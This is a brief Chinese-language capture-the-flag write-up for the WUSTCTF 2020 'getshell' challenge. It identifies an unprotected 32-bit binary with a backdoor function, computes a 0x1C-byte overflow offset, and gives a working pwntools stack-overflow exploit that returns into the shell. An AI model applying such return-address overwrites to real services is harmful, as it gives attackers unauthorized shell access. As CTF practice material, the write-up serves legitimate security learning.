[WUSTCTF 2020]getshell 题目笔记

先分析一下，32位程序，无保护，可执行

用IDA分析，发现buf存在泄露点

shell函数存在后门，在0x0804851B

计算一下长度，0x18+0x4=0x1C

构造exp如下

from pwn import *

filename = "./pwn"
p = remote("", )
shell = 0x0804851B
payload = b'a'*0x1C + p32(shell)
p.sendline(payload)
p.interactive()